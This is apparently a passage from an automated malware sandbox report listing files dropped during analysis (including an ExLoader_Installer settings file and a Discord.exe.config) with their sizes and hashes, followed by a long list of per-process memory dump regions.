                                                                                                          fba7e4e0f86619aaf2868cedd72149e56a5a87d4

                                                                                                          SHA256

                                                                                                          0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2

                                                                                                          SHA512

                                                                                                          3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ls22qmy2.vvk.ps1

                                                                                                          Filesize

                                                                                                          60B

                                                                                                          MD5

                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                          SHA1

                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                          SHA256

                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                          SHA512

                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                        • C:\Users\Admin\AppData\Roaming\com.swiftsoft\ExLoader_Installer\shared_preferences.json

                                                                                                          Filesize

                                                                                                          229B

                                                                                                          MD5

                                                                                                          8110be7b78986a556f833cd83343a05b

                                                                                                          SHA1

                                                                                                          775a78062b04d2bb27d9d430ce98d80aa799e3b3

                                                                                                          SHA256

                                                                                                          f861fb8555b691da22f29c34da7baf7eb65495834e280bfa0794222a497d52ab

                                                                                                          SHA512

                                                                                                          4b38c7427c5e6245e94543650b1004f76d6f40ee5c050764e91ae8f4fcc2765215f91b7328882f663037dcfd820a9e0de84f01f131f766cabf60f161290235a7

                                                                                                        • C:\Users\Admin\AppData\Roaming\privategamebase\Discord.exe.config

                                                                                                          Filesize

                                                                                                          357B

                                                                                                          MD5

                                                                                                          a2b76cea3a59fa9af5ea21ff68139c98

                                                                                                          SHA1

                                                                                                          35d76475e6a54c168f536e30206578babff58274

                                                                                                          SHA256

                                                                                                          f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839

                                                                                                          SHA512

                                                                                                          b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad

                                                                                                        • memory/2676-398-0x0000000006780000-0x000000000681C000-memory.dmp

                                                                                                          Filesize

                                                                                                          624KB

                                                                                                        • memory/2676-319-0x0000000005E50000-0x0000000005E9E000-memory.dmp

                                                                                                          Filesize

                                                                                                          312KB

                                                                                                        • memory/2676-318-0x0000000005670000-0x0000000005682000-memory.dmp

                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/2780-344-0x0000015D1E2B0000-0x0000015D1E2D2000-memory.dmp

                                                                                                          Filesize

                                                                                                          136KB

                                                                                                        • memory/3392-727-0x000001ABC16B0000-0x000001ABC16B8000-memory.dmp

                                                                                                          Filesize

                                                                                                          32KB

                                                                                                        • memory/3644-92-0x0000000003590000-0x000000000359E000-memory.dmp

                                                                                                          Filesize

                                                                                                          56KB

                                                                                                        • memory/3644-93-0x0000000005DB0000-0x0000000005E0C000-memory.dmp

                                                                                                          Filesize

                                                                                                          368KB

                                                                                                        • memory/3644-103-0x0000000005F90000-0x0000000006022000-memory.dmp

                                                                                                          Filesize

                                                                                                          584KB

                                                                                                        • memory/3644-102-0x00000000064A0000-0x0000000006A44000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.6MB

                                                                                                        • memory/3644-73-0x0000000000FD0000-0x0000000001314000-memory.dmp

                                                                                                          Filesize

                                                                                                          3.3MB

                                                                                                        • memory/3644-124-0x0000000005F70000-0x0000000005F82000-memory.dmp

                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/3648-802-0x00007FFA0AA80000-0x00007FFA0B069000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.9MB

                                                                                                        • memory/3648-816-0x00007FFA0A860000-0x00007FFA0A9D7000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.5MB

                                                                                                        • memory/3648-150-0x00007FFA0A860000-0x00007FFA0A9D7000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.5MB

                                                                                                        • memory/3648-160-0x00007FFA1A380000-0x00007FFA1A399000-memory.dmp

                                                                                                          Filesize

                                                                                                          100KB

                                                                                                        • memory/3648-251-0x00007FFA0AA80000-0x00007FFA0B069000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.9MB

                                                                                                        • memory/3648-144-0x00007FFA10A30000-0x00007FFA10A53000-memory.dmp

                                                                                                          Filesize

                                                                                                          140KB

                                                                                                        • memory/3648-138-0x00007FFA14DF0000-0x00007FFA14E1D000-memory.dmp

                                                                                                          Filesize

                                                                                                          180KB

                                                                                                        • memory/3648-881-0x00007FFA0A090000-0x00007FFA0A5B0000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.1MB

                                                                                                        • memory/3648-882-0x00007FFA199D0000-0x00007FFA199E4000-memory.dmp

                                                                                                          Filesize

                                                                                                          80KB

                                                                                                        • memory/3648-883-0x00007FFA1A5D0000-0x00007FFA1A5DD000-memory.dmp

                                                                                                          Filesize

                                                                                                          52KB

                                                                                                        • memory/3648-252-0x00007FFA1A5D0000-0x00007FFA1A5DD000-memory.dmp

                                                                                                          Filesize

                                                                                                          52KB

                                                                                                        • memory/3648-267-0x00007FFA09F70000-0x00007FFA0A08C000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.1MB

                                                                                                        • memory/3648-266-0x00007FFA1B110000-0x00007FFA1B133000-memory.dmp

                                                                                                          Filesize

                                                                                                          140KB

                                                                                                        • memory/3648-204-0x0000021C50F20000-0x0000021C51440000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.1MB

                                                                                                        • memory/3648-195-0x00007FFA0A090000-0x00007FFA0A5B0000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.1MB

                                                                                                        • memory/3648-884-0x00007FFA09F70000-0x00007FFA0A08C000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.1MB

                                                                                                        • memory/3648-872-0x00007FFA1B110000-0x00007FFA1B133000-memory.dmp

                                                                                                          Filesize

                                                                                                          140KB

                                                                                                        • memory/3648-873-0x00007FFA1B620000-0x00007FFA1B62F000-memory.dmp

                                                                                                          Filesize

                                                                                                          60KB

                                                                                                        • memory/3648-874-0x00007FFA14DF0000-0x00007FFA14E1D000-memory.dmp

                                                                                                          Filesize

                                                                                                          180KB

                                                                                                        • memory/3648-876-0x00007FFA0A860000-0x00007FFA0A9D7000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.5MB

                                                                                                        • memory/3648-180-0x00007FFA0A5B0000-0x00007FFA0A67D000-memory.dmp

                                                                                                          Filesize

                                                                                                          820KB

                                                                                                        • memory/3648-90-0x00007FFA1B110000-0x00007FFA1B133000-memory.dmp

                                                                                                          Filesize

                                                                                                          140KB

                                                                                                        • memory/3648-91-0x00007FFA1B620000-0x00007FFA1B62F000-memory.dmp

                                                                                                          Filesize

                                                                                                          60KB

                                                                                                        • memory/3648-59-0x00007FFA0AA80000-0x00007FFA0B069000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.9MB

                                                                                                        • memory/3648-877-0x00007FFA1A380000-0x00007FFA1A399000-memory.dmp

                                                                                                          Filesize

                                                                                                          100KB

                                                                                                        • memory/3648-878-0x00007FFA1AB80000-0x00007FFA1AB8D000-memory.dmp

                                                                                                          Filesize

                                                                                                          52KB

                                                                                                        • memory/3648-646-0x00007FFA10A30000-0x00007FFA10A53000-memory.dmp

                                                                                                          Filesize

                                                                                                          140KB

                                                                                                        • memory/3648-642-0x00007FFA0AA80000-0x00007FFA0B069000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.9MB

                                                                                                        • memory/3648-651-0x00007FFA0A5B0000-0x00007FFA0A67D000-memory.dmp

                                                                                                          Filesize

                                                                                                          820KB

                                                                                                        • memory/3648-650-0x00007FFA19BA0000-0x00007FFA19BD3000-memory.dmp

                                                                                                          Filesize

                                                                                                          204KB

                                                                                                        • memory/3648-648-0x00007FFA1A380000-0x00007FFA1A399000-memory.dmp

                                                                                                          Filesize

                                                                                                          100KB

                                                                                                        • memory/3648-652-0x00007FFA0A090000-0x00007FFA0A5B0000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.1MB

                                                                                                        • memory/3648-879-0x00007FFA19BA0000-0x00007FFA19BD3000-memory.dmp

                                                                                                          Filesize

                                                                                                          204KB

                                                                                                        • memory/3648-880-0x00007FFA0A5B0000-0x00007FFA0A67D000-memory.dmp

                                                                                                          Filesize

                                                                                                          820KB

                                                                                                        • memory/3648-875-0x00007FFA10A30000-0x00007FFA10A53000-memory.dmp

                                                                                                          Filesize

                                                                                                          140KB

                                                                                                        • memory/3648-871-0x00007FFA0AA80000-0x00007FFA0B069000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.9MB

                                                                                                        • memory/3648-842-0x0000021C50F20000-0x0000021C51440000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.1MB

                                                                                                        • memory/3648-828-0x00007FFA0AA80000-0x00007FFA0B069000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.9MB

                                                                                                        • memory/3648-231-0x00007FFA199D0000-0x00007FFA199E4000-memory.dmp

                                                                                                          Filesize

                                                                                                          80KB

                                                                                                        • memory/3648-803-0x00007FFA1B110000-0x00007FFA1B133000-memory.dmp

                                                                                                          Filesize

                                                                                                          140KB

                                                                                                        • memory/3648-175-0x00007FFA1AB80000-0x00007FFA1AB8D000-memory.dmp

                                                                                                          Filesize

                                                                                                          52KB

                                                                                                        • memory/3648-811-0x00007FFA0A5B0000-0x00007FFA0A67D000-memory.dmp

                                                                                                          Filesize

                                                                                                          820KB

                                                                                                        • memory/3648-810-0x00007FFA19BA0000-0x00007FFA19BD3000-memory.dmp

                                                                                                          Filesize

                                                                                                          204KB

                                                                                                        • memory/3648-812-0x00007FFA0A090000-0x00007FFA0A5B0000-memory.dmp

                                                                                                          Filesize

                                                                                                          5.1MB

                                                                                                        • memory/3648-176-0x00007FFA19BA0000-0x00007FFA19BD3000-memory.dmp

                                                                                                          Filesize

                                                                                                          204KB

                                                                                                        • memory/3868-627-0x00000000070D0000-0x0000000007136000-memory.dmp

                                                                                                          Filesize

                                                                                                          408KB

                                                                                                        • memory/3868-661-0x0000000007D80000-0x0000000007F42000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.8MB

                                                                                                        • memory/3868-685-0x00000000081E0000-0x0000000008230000-memory.dmp

                                                                                                          Filesize

                                                                                                          320KB

                                                                                                        • memory/3868-578-0x0000000005BA0000-0x0000000005BB0000-memory.dmp

                                                                                                          Filesize

                                                                                                          64KB

                                                                                                        • memory/3868-659-0x0000000007280000-0x00000000072CC000-memory.dmp

                                                                                                          Filesize

                                                                                                          304KB

                                                                                                        • memory/3868-658-0x0000000007240000-0x000000000727C000-memory.dmp

                                                                                                          Filesize

                                                                                                          240KB

                                                                                                        • memory/3868-657-0x00000000071E0000-0x00000000071F2000-memory.dmp

                                                                                                          Filesize

                                                                                                          72KB

                                                                                                        • memory/3868-656-0x0000000007760000-0x0000000007D78000-memory.dmp

                                                                                                          Filesize

                                                                                                          6.1MB

                                                                                                        • memory/3868-573-0x0000000005B70000-0x0000000005B88000-memory.dmp

                                                                                                          Filesize

                                                                                                          96KB

                                                                                                        • memory/3868-662-0x00000000075E0000-0x00000000075EE000-memory.dmp

                                                                                                          Filesize

                                                                                                          56KB

                                                                                                        • memory/3868-660-0x0000000007410000-0x000000000751A000-memory.dmp

                                                                                                          Filesize

                                                                                                          1.0MB

                                                                                                        • memory/3868-579-0x0000000006830000-0x000000000683A000-memory.dmp

                                                                                                          Filesize

                                                                                                          40KB

                                                                                                        • memory/4264-604-0x000002C959F30000-0x000002C95AC81000-memory.dmp

                                                                                                          Filesize

                                                                                                          13.3MB

                                                                                                        • memory/4264-601-0x000002C959F30000-0x000002C95AC81000-memory.dmp

                                                                                                          Filesize

                                                                                                          13.3MB

                                                                                                        • memory/4264-600-0x000002C956460000-0x000002C956461000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/4264-605-0x000002C959F30000-0x000002C95AC81000-memory.dmp

                                                                                                          Filesize

                                                                                                          13.3MB

                                                                                                        • memory/4264-606-0x000002C956470000-0x000002C956471000-memory.dmp

                                                                                                          Filesize

                                                                                                          4KB

                                                                                                        • memory/5052-54-0x0000000000400000-0x0000000002440000-memory.dmp

                                                                                                          Filesize

                                                                                                          32.2MB